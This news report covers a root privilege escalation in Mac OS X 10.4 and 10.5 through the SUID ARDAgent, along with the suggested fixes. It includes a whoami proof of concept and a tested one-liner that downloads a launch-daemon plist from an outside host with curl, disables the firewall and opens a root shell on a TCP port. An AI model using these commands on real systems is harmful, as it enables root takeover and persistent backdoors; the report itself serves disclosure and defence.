Root exploit for Mac OS X
A vulnerability in Mac OS X 10.4 and 10.5 makes it easy for potential attackers to obtain root rights to a system. The ARDAgent – Apple Remote Desktop – part of Remote Management has the SUID bit set. ARDAgent is able to run AppleScript with root rights and these, in turn, may contain shell commands – all without requiring a password.
To demonstrate the problem as a standard user or guest on a computer, type osascript -e 'tell app "ARDAgent" to do shell script "whoami"';
into the console. Physical access to a system is not required for an attack to be successful. In principle, the exploit will also work remotely, say on a server on which a user has a restricted account with SSH access.
A suggestion of how this could be exploited to implement a backdoor has already been posted on Slashdot. When tested at heise Security, the line osascript -e 'tell app "ARDAgent" to do shell script "cd /System/Library/LaunchDaemons ; curl -o bash.plist http://cdslash.net/temp/bash.plist [cdslash.net] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start com.apple.bash ; ipfw disable firewall; launchctl "'
opened a root shell at TCP port 9999.
Several ways to solve the problem have now been suggested. The exploit doesn't work if the "Remote Management" option is enabled under Mac OS X 10.5 "System Settings/Sharing/" – but this is not the default setting. Neither does it work if the Apple Remote Desktop client has been installed and enabled under Mac OS X 10.4. Other suggestions are to completely remove the Apple Remote Desktop, to compress the file, or to delete the SUID bit in ARDAgent chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAg ent
.
See also:
- Mac OS X Root Escalation Through AppleScript, thread on Slashdot
- Apple Remote Desktop Vulnerability Allows Malicious Programs to Execute Code as Root, report by Intego
(mba)